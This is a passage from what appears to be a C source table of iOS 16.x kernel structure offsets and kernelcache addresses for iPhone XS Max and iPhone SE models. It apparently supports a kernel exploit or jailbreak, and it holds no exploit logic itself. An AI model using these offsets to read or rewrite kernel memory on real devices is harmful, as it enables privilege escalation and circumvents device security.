0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a311288, .kernelcache__gPhysBase = 0xfffffff0078fc0e0, .kernelcache__gPhysSize = 0xfffffff0078fc0e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078fa2b8, .kernelcache__perfmon_devices = 0xfffffff00a34f500, .kernelcache__perfmon_dev_open = 0xfffffff007e9dc8c, .kernelcache__ptov_table = 0xfffffff0078af160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a34e990, .kernelcache__vm_pages = 0xfffffff0078abea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ae110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a34e988, .kernelcache__vn_kqfilter = 0xfffffff007eecad8, }, // iOS 16.6 beta 1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e5ab0, .kernelcache__gPhysBase = 0xfffffff007914288, .kernelcache__gPhysSize = 0xfffffff007914288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007912440, .kernelcache__perfmon_devices = 0xfffffff00a425530, .kernelcache__perfmon_dev_open = 0xfffffff007ec2434, .kernelcache__ptov_table = 0xfffffff0078c79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a424910, .kernelcache__vm_pages = 0xfffffff0078c40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078c6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a424908, .kernelcache__vn_kqfilter = 0xfffffff007f10c44, }, // End iPhone Xs Max Global // // Start iPhone XS Max China // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a235178, .kernelcache__gPhysBase = 0xfffffff00781fc60, .kernelcache__gPhysSize = 0xfffffff00781fc60 + 0x8, .kernelcache__gVirtBase = 0xfffffff00781de40, .kernelcache__perfmon_devices = 0xfffffff00a270380, .kernelcache__perfmon_dev_open = 0xfffffff007e773ac, .kernelcache__ptov_table = 0xfffffff0077d3248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a26f800, .kernelcache__vm_pages = 0xfffffff0077d0080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077d2208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a26f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a44, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E247", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a311288, .kernelcache__gPhysBase = 0xfffffff0078fc0e0, .kernelcache__gPhysSize = 0xfffffff0078fc0e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078fa2b8, .kernelcache__perfmon_devices = 0xfffffff00a34f500, .kernelcache__perfmon_dev_open = 0xfffffff007e9dc8c, .kernelcache__ptov_table = 0xfffffff0078af160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a34e990, .kernelcache__vm_pages = 0xfffffff0078abea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ae110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a34e988, .kernelcache__vn_kqfilter = 0xfffffff007eecad8, }, // iOS 16.6 beta 1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPhone11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e5ab0, .kernelcache__gPhysBase = 0xfffffff007914288, .kernelcache__gPhysSize = 0xfffffff007914288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007912440, .kernelcache__perfmon_devices = 0xfffffff00a425530, .kernelcache__perfmon_dev_open = 0xfffffff007ec2434, .kernelcache__ptov_table = 0xfffffff0078c79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a424910, .kernelcache__vm_pages = 0xfffffff0078c40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078c6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a424908, .kernelcache__vn_kqfilter = 0xfffffff007f10c44, }, // End iPhone XS Max China// // End iPhone XR, XS, XS Max // // Start iPhone SE 2nd, iPhone 11 Pro, iPhone 11 Pro Max, iPhone 11 series // // Start iPhone SE 2nd // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPhone12,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 